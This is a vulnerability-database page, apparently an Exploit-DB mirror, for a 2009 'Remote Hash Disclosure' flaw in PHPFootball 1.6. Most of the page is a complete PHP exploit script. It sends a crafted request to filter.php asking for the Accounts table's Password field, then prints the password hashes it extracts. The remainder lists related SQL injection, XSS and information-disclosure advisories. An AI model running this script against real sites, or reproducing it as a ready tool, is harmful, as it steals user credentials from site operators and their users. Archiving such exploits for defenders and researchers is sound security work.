Lucene search
KinG-LioNEDB-ID:7636HistoryJan 01, 2009 - 12:00 a.m.
PHPFootball 1.6 - Remote Hash Disclosure
2009-01-0100:00:00
KinG-LioN
www.exploit-db.com
30
AI Score
7.4
Confidence
Low
<?php
// http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip
$host = $argv[1];
$path = $argv[2];
if ($argc != 3) {
echo "PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit\n";
echo "by KinG-LioN - http://eurohackers.it\n";
echo "Usage: php {$argv[0]} <host> <path>\n";
exit;
}
else {
$head .= "GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n";
$head .= "Host: {$host}\r\n";
$head .= "Connection: close\r\n\r\n";
$fsock = fsockopen ($host,80);
fputs ($fsock,$head);
while (!feof($fsock)) {
$cont .= fgets($fsock);
}
fclose($fsock);
if (preg_match_all("/<td class=td>(.+?)<\/td>/",$cont,$i)) {
print_r($i[1]);
}
else {
die ("exploit error\n");
}
}
?>
# milw0rm.com [2009-01-01]Related
prion
prion
Sql injection
2009-02-23 15:30:00
Sql injection
2009-02-23 15:30:00
Cross site scripting
2009-02-23 15:30:00
cve
cve
nvd
nvd
cvelist
cvelist
openvas
openvas
CelerBB Information Disclosure and Multiple SQL Injection Vulnerabilities
2009-03-06 00:00:00
PHPFootball 'filter.php' Password Hash Information Disclosure Vulnerability
2009-03-06 00:00:00
PHPFootball <= 1.6 Information Disclosure Vulnerability - Active Check
2009-03-06 00:00:00